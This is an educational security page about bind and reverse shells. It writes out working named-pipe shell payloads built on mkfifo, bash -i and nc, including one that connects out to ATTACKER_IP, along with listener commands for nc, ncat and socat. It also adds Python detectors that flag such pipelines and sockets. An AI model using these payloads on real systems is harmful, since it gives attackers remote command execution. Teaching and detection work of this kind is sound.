Shells

A shell is a utility (software) that acts as an interface between a user and the operating system (the kernel and its services).

  • It can be a graphical interface, but it is usually a command-line interface, and this will depend on the operating system running on the target system.
  • For example, in Linux there are several shell environments, such as Bash, ksh, and tcsh.
  • Traditionally, in Windows the shell is the command prompt (command-line interface), which is invoked by cmd.exe. Windows PowerShell is a newer Microsoft shell that combines the old CMD functionality with a new scripting/cmdlet instruction set with built-in system administration functionality. PowerShell cmdlets allow users and administrators to automate complicated tasks with reusable scripts.

In cyber security, the term commonly refers to the shell session an attacker uses after accessing a compromised system, which lets them run commands and execute software. This access enables several activities, some of which are described below.

  • Remote System Control: allows the attacker to execute commands or software remotely in the target system.
  • Privilege Escalation: If initial access through a shell is limited or restricted, attackers can explore ways to escalate privileges to more elevated or administrative access.
  • Data Exfiltration: Once attackers have access to execute commands through an obtained shell, they can explore the system to read and copy sensitive data from it.
  • Persistence and Maintaining Access: Once shell access is obtained, attackers can create their own users and credentials or copy backdoor software onto the system to keep access to it for later use.
  • Post-Exploitation Activities: After access to a shell is granted, attackers can perform a wide range of post-exploitation activities, such as deploying malware, creating hidden accounts, and deleting information.
  • Access Other Systems on the Network: Depending on the attacker’s intentions, the obtained shell can be just an initial access point. The goal can be to hop through the network to a different target, using the obtained shell as a pivot to other points in the compromised network. This is also known as pivoting.

Bind shell#

With a bind shell, an attacker opens a port or a listener on the compromised system and waits for a connection. When this connection occurs, the listener exposes the shell session so the attacker can execute commands remotely.
This is done so that the attacker can connect to the victim from any system, execute commands, and further manipulate the victim.

Setting Up the Bind Shell on the Target#

Let’s create a bind shell. In this case, the attacker can use a command like the one below on the victim’s machine:

```plaintext
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f
```

Explanation of the Payload

  • rm -f /tmp/f - Removes any existing file at /tmp/f (for example a named pipe left over from an earlier run). This ensures that the command can create a new named pipe without conflicts.
  • mkfifo /tmp/f - Creates a named pipe, or FIFO, at /tmp/f. Named pipes allow communication between processes; in this context, it acts as the conduit for the input that comes back from the network.
  • cat /tmp/f - Reads data from the named pipe. It blocks until input is sent through the pipe.
  • | bash -i 2>&1 - The output of cat is piped to an interactive shell instance (bash -i), so whatever arrives through the pipe is executed as commands. The 2>&1 redirects standard error to standard output, ensuring error messages are returned to the attacker as well.
  • | nc -l 0.0.0.0 8080 - Starts Netcat in listen mode (-l) on all interfaces (0.0.0.0) and port 8080. The shell’s output is sent to the attacker once they connect to this port.
  • > /tmp/f - This final part writes whatever Netcat receives from the connection into the named pipe, where cat reads it and feeds it to the shell, which closes the loop and gives bidirectional communication.

The command above will listen for incoming connections and expose a bash shell. Note that ports below 1024 require Netcat to be run with elevated privileges; using port 8080 avoids this.

Attacker Connects to the Bind Shell#

Now that the victim’s machine is waiting for incoming connections, we can use Netcat again with the following command to connect.

```plaintext
nc -nv TARGET_IP 8080
```

Explanation of the command

  • nc - Invokes Netcat, which establishes the connection to the target.
  • -n - Disables DNS resolution, so Netcat operates faster and avoids unnecessary lookups.
  • -v - Verbose mode provides detailed output of the connection process, such as when the connection is established.
  • TARGET_IP - The IP address of the lab machine where the bind shell is running.
  • 8080 - The port number on which the bind shell listens.

After connecting, we get a shell.

Reverse shell#

A reverse shell, sometimes referred to as a “connect back shell,” is when the attacking system has a listener (an open port) and the victim initiates a connection back to the attacking system.
Because the connection is initiated from the target system to the attacker’s machine, it is outbound traffic from the victim’s point of view, which can help it get past network firewalls and other security appliances that mainly filter inbound connections.

Set up a Netcat (nc) Listener#

The attacker’s machine will be waiting for a connection, so let’s use Netcat to listen to a connection using the following command:

```plaintext
nc -lvnp <port>
```

Gaining Reverse Shell Access#

Once the listener is set, the attacker executes what is known as a reverse shell payload. This payload usually abuses the vulnerability or unauthorized access the attacker has already obtained and runs a command that exposes the shell over the network. There is a variety of payloads, and the right one depends on the tools available on, and the OS of, the compromised system.

As an example, let’s analyze a named-pipe reverse shell payload, shown below.

```plaintext
rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc ATTACKER_IP ATTACKER_PORT >/tmp/f
```

Explanation of the Payload

  • rm -f /tmp/f - Removes any existing file at /tmp/f (for example a named pipe left over from an earlier run). This ensures that the command can create a new named pipe without conflicts.
  • mkfifo /tmp/f - Creates a named pipe, or FIFO (first-in, first-out), at /tmp/f. Named pipes allow communication between processes; in this context, it acts as the conduit for the input that comes back from the network.
  • cat /tmp/f - Reads data from the named pipe. It blocks until input is sent through the pipe.
  • | sh -i 2>&1 - The output of cat is piped to an interactive shell instance (sh -i), so whatever arrives through the pipe is executed as commands. The 2>&1 redirects standard error to standard output, ensuring that error messages are sent back to the attacker as well.
  • | nc ATTACKER_IP ATTACKER_PORT - Pipes the shell’s output through nc (Netcat), which connects out to the attacker’s IP address (ATTACKER_IP) on the attacker’s port (ATTACKER_PORT).
  • >/tmp/f - This final part writes whatever Netcat receives from the connection into the named pipe, where cat reads it and feeds it to the shell, giving bidirectional communication.

The payload above exposes the sh shell over the network to the chosen listener.
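Both payloads above (the bind shell with nc -l and the reverse shell with nc ATTACKER_IP ATTACKER_PORT) leave a recognisable trace on the compromised host: one command line that chains mkfifo, an interactive shell (-i) and a netcat-style process. The following detector is an added example written for this page and is not code from the original post. It takes (pid, user, args) records of the kind `ps -eo pid,user,args`, an auditd EXECVE event or an EDR process-creation log would provide; the records below are constructed, and the addresses are from documentation ranges. It tells bind from reverse by whether netcat was started in listen mode, and it also copes with the pipeline being wrapped in a bash -c "..." string.

```python
"""Flag named-pipe bind/reverse shell pipelines in process command lines.

Added example, not part of the original page. Input records are constructed
to look like `ps -eo pid,user,args` output (or an EDR / auditd EXECVE command
line) where the whole pipeline was launched through one shell invocation.
"""
import re
import shlex
from dataclasses import dataclass
from typing import List, Optional, Tuple

NETCAT_NAMES = {"nc", "ncat", "netcat"}
SHELL_NAMES = {"sh", "bash", "dash", "zsh", "ksh"}
# Operators that join the stages of the payload: | || ; &&
SEGMENT_SPLIT = re.compile(r"\|\|?|;|&&")
# Redirection tokens such as ">/tmp/f", "2>&1", ">" or "<"
REDIRECT = re.compile(r"^\d*[<>]")
BARE_REDIRECT = {">", ">>", "<", "2>", "2>>", "1>", "&>"}


@dataclass
class Finding:
    pid: int
    user: str
    kind: str            # "bind_shell" (nc listening) or "reverse_shell" (nc connecting out)
    port: int
    peer: str            # bind address for bind shells, remote host for reverse shells
    fifo: Optional[str]  # path given to mkfifo, if any


def _argv(segment: str) -> List[str]:
    try:
        return shlex.split(segment)
    except ValueError:                 # unbalanced quote inside a bash -c "..." wrapper
        return segment.split()


def _strip_redirections(argv: List[str]) -> List[str]:
    out, skip_next = [], False
    for tok in argv:
        if skip_next:
            skip_next = False
        elif REDIRECT.match(tok):
            skip_next = tok in BARE_REDIRECT   # a bare ">" takes the next token as its target
        else:
            out.append(tok)
    return out


def _is_listen(argv: List[str]) -> bool:
    # "-l" may be bundled as in -lvnp; long options such as --ssl must not match
    for tok in argv[1:]:
        if tok == "--listen" or (tok.startswith("-") and not tok.startswith("--") and "l" in tok[1:]):
            return True
    return False


def _netcat_endpoint(argv: List[str]) -> Optional[Tuple[str, str, int]]:
    """Return (kind, peer, port) for a netcat argv, or None if no port is visible."""
    positional = [t for t in argv[1:] if not t.startswith("-")]
    if not positional or not positional[-1].isdigit():
        return None
    port = int(positional[-1])
    peer = positional[-2] if len(positional) >= 2 else "0.0.0.0"
    kind = "bind_shell" if _is_listen(argv) else "reverse_shell"
    return kind, peer, port


def analyze_cmdline(pid: int, user: str, cmdline: str) -> Optional[Finding]:
    """Return a Finding when the command line chains an interactive shell into netcat."""
    fifo, shell_seen, netcat = None, False, None
    for segment in SEGMENT_SPLIT.split(cmdline):
        argv = _strip_redirections(_argv(segment))
        if not argv:
            continue
        name = argv[0].rsplit("/", 1)[-1]          # /bin/sh -> sh
        if name == "mkfifo" and len(argv) > 1:
            fifo = argv[1]
        elif name in SHELL_NAMES and "-i" in argv[1:]:
            shell_seen = True
        elif name in NETCAT_NAMES:
            netcat = _netcat_endpoint(argv)
    if shell_seen and netcat:
        kind, peer, port = netcat
        return Finding(pid, user, kind, port, peer, fifo)
    return None


def scan(records) -> List[Finding]:
    return [f for f in (analyze_cmdline(*r) for r in records) if f is not None]


# Constructed sample records: (pid, user, args). Addresses are documentation ranges.
SAMPLE_PROCESSES = [
    (4242, "www-data", "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | bash -i 2>&1 | nc -l 0.0.0.0 8080 > /tmp/f"),
    (4311, "www-data", "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 203.0.113.9 443 >/tmp/f"),
    (5100, "www-data", 'bash -c "rm -f /tmp/f; mkfifo /tmp/f; cat /tmp/f | sh -i 2>&1 | nc 203.0.113.9 4444 >/tmp/f"'),
    (812, "root", "/usr/sbin/sshd -D"),
    (1337, "alice", "nc -zv db.internal 5432"),   # connectivity check: netcat, but no shell in the pipeline
    (2001, "bob", "bash -i"),                    # interactive shell with no network stage
]

if __name__ == "__main__":
    for f in scan(SAMPLE_PROCESSES):
        print(f"pid {f.pid} ({f.user}): {f.kind} via {f.peer}:{f.port}, fifo={f.fifo}")
```

The check deliberately requires both an interactive shell and a netcat stage in the same command line, so a plain `nc -zv host port` connectivity check or a lone `bash -i` is not reported; on a real host the same records can be collected continuously from process-creation events rather than from a one-off ps snapshot.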

Attacker Receives the Shell#

Once the above payload is executed, the attacker will receive a reverse shell allowing them to execute commands as if they were logged into a regular terminal in the OS.

Tools#

Many tools allow you to create bind and reverse shells from a compromised host. Some of the most popular ones are the Meterpreter module in Metasploit and Netcat. Netcat is one of the best and most versatile tools for pen testers because it is lightweight and very portable.

A utility like Netcat will handle the connection and allow the attacker to interact with the exposed shell, but Netcat is not the only utility that will allow us to do that.
Here are some other tools that can be used as listeners to interact with an incoming shell.

Rlwrap#

It is a small utility that uses the GNU readline library to provide keyboard line editing and command history for programs that lack them.

Usage Example (Enhancing a Netcat Shell With Rlwrap)

```plaintext
attacker@kali:~$ rlwrap nc -lvnp 443
listening on [any] 443 ...
shell
```

This wraps nc with rlwrap, allowing the use of features like arrow keys and history for better interaction.

Ncat#

Ncat is an improved version of Netcat distributed by the Nmap project. It provides extra features, such as SSL/TLS encryption of the connection.

Usage Example (Listening for Reverse Shells)

```plaintext
attacker@kali:~$ ncat -lvnp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
shell
```

Usage Example (Listening for Reverse Shells with SSL)

```plaintext
attacker@kali:~$ ncat --ssl -lvnp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Generating a temporary 2048-bit RSA key. Use --ssl-key and --ssl-cert to use a permanent one.
Ncat: SHA-1 fingerprint: B7AC F999 7FB0 9FF9 14F5 5F12 6A17 B0DC B094 AB7F
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
shell
```

The --ssl option enables SSL/TLS encryption for the listener; the connecting side has to use --ssl as well, otherwise the handshake fails. Encrypting the channel hides the shell’s traffic from content inspection, which is why endpoint-side detection (process and socket monitoring) matters more than payload signatures on the wire.

Socat#

It is a utility that allows you to create a socket connection between two data sources, in this case, two different hosts.

Default Usage Example (Listening for Reverse Shell):

```plaintext
attacker@kali:~$ socat -d -d TCP-LISTEN:443 STDOUT
2024/09/23 15:44:38 socat[41135] N listening on AF=2 0.0.0.0:443
shell
```

The command above uses the -d option to enable verbose output; giving it twice (-d -d) increases the verbosity further. The TCP-LISTEN:443 option creates a TCP listener on port 443, establishing a server socket for incoming connections. Finally, the STDOUT option directs any incoming data to the terminal.
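Netcat, Ncat and socat are small, static-friendly binaries, so the same utilities shown here as attacker-side listeners are what a defender tends to find owning sockets on a host where a bind or reverse shell is running: a listening socket owned by nc/socat (bind shell) or an established outbound connection owned by nc or by the shell itself (reverse shell). The script below is an added example, not code from the original page or from any of these tools. It parses output in the column layout of `ss -tanp` on Linux; the sample is constructed, with addresses from documentation ranges, and on a real host you would pass the command’s actual output to `scan_ss_output()`.

```python
"""Flag listening and established sockets owned by shell or relay utilities.

Added example, not part of the original page. The sample below is constructed
in the column layout of `ss -tanp` on Linux; on a real host, feed the command's
output to scan_ss_output() instead.
"""
import re
from typing import Dict, List, Tuple

# Programs that have no business owning a socket on most servers: the netcat
# family and socat (relays), and the shells themselves.
RELAY_OR_SHELL = {"nc", "ncat", "netcat", "socat", "sh", "bash", "dash"}

# State  Recv-Q  Send-Q  Local Address:Port  Peer Address:Port  Process
LINE_RE = re.compile(
    r"^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+(?P<proc>.*)$"
)
# ss prints owners as users:(("nc",pid=4242,fd=3),("sh",pid=4243,fd=3))
PROC_RE = re.compile(r'\("([^"]+)",pid=(\d+),fd=\d+\)')

# Constructed sample output (not captured from a real system).
SAMPLE_SS = """\
State   Recv-Q  Send-Q   Local Address:Port    Peer Address:Port   Process
LISTEN  0       1        0.0.0.0:8080          0.0.0.0:*           users:(("nc",pid=4242,fd=3))
LISTEN  0       128      0.0.0.0:22            0.0.0.0:*           users:(("sshd",pid=812,fd=3))
ESTAB   0       0        10.0.0.5:51234        203.0.113.9:443     users:(("nc",pid=4311,fd=3))
ESTAB   0       0        10.0.0.5:40122        10.0.0.2:5432       users:(("postgres",pid=990,fd=9))
LISTEN  0       5        [::]:4444             [::]:*              users:(("socat",pid=4400,fd=5))
"""


def split_endpoint(endpoint: str) -> Tuple[str, str]:
    """'[::]:4444' -> ('[::]', '4444'); '0.0.0.0:*' -> ('0.0.0.0', '*')."""
    host, _, port = endpoint.rpartition(":")
    return host, port


def parse_ss(text: str) -> List[Dict]:
    """Turn ss output into rows of state, local/peer endpoint and owning (name, pid) pairs."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue   # header or blank line (the header has no numeric queue columns)
        owners = [(name, int(pid)) for name, pid in PROC_RE.findall(m["proc"])]
        rows.append({"state": m["state"], "local": m["local"], "peer": m["peer"], "owners": owners})
    return rows


def find_suspicious(rows: List[Dict]) -> List[Tuple[int, str, str, str]]:
    """Return (pid, program, verdict, endpoint) for sockets owned by a relay or a shell."""
    findings = []
    for row in rows:
        for name, pid in row["owners"]:
            if name not in RELAY_OR_SHELL:
                continue
            if row["state"] == "LISTEN":
                _, port = split_endpoint(row["local"])
                findings.append((pid, name, "possible bind shell listener", f"port {port}"))
            elif row["state"] == "ESTAB":
                host, port = split_endpoint(row["peer"])
                findings.append((pid, name, "possible reverse shell connection", f"{host}:{port}"))
    return findings


def scan_ss_output(text: str) -> List[Tuple[int, str, str, str]]:
    return find_suspicious(parse_ss(text))


if __name__ == "__main__":
    for pid, name, verdict, endpoint in scan_ss_output(SAMPLE_SS):
        print(f"pid {pid} ({name}): {verdict} on {endpoint}")
```

A listener on a high port owned by sshd or postgres is expected and is not reported; what the check surfaces is the owner, not the port number, so it still fires when the listener is parked on 443 to blend in. Run as root (or with CAP_NET_ADMIN) so that ss can show the owning process for every socket.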

https://nahil.xyz/vault/offensive-security/shells/
Author Nahil Rasheed
Published at July 4, 2025
Disclaimer This content is provided strictly for educational purposes only.